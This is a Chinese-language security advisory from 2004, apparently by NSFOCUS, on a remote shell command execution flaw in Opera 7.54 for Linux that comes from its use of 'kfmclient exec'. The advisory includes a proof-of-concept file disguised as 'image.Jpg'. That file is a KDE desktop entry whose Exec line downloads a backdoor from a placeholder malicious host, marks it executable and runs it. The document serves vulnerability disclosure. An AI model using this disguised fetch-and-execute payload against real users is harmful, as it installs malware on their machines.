首页 -> 安全研究

安全研究

安全漏洞
Opera kfmclient远程任意SHELL命令执行漏洞

发布日期:2004-12-13
更新日期:2004-12-14

受影响系统:
Opera Software Opera Web Browser 7.54
描述:
Opera for Linux使用"kfmclient exec"作为默认应用程序处理保存文件。

"kfmclient exec"在处理文件名时存在问题,远程攻击者可以利用这个漏洞以用户进程权限执行任意SHELL命令。

实际上"kfmclient exec"命令可用于打开"Kde Desktop Entry",然后执行"Exec="中的命令。利用此漏洞需要一个特殊的文件名扩展,如果page.Htm用于文件名,并"kfmclient exec page.Htm"被打开,那么"Exec="中的命令就会执行,相反,如果"page.htm"用于文件名,那么就会作为"kde desktop entry"打开,被konqueror查看,因此如果构建一个名为Image.Jpg文件,包含如下条目:

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

当目标用户选择"Open"查看image.Jpg时,会被"kfmclient exec"打开而执行SHELL命令。

<*来源:Giovanni Delvecchio (badpenguin79@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110297235619877&w=2
*>

建议:
厂商补丁:

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.opera.com

浏览次数:3396
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障